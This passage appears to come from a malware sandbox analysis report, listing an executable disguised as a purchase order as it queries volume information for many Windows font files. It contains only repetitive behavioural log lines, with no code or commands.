                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
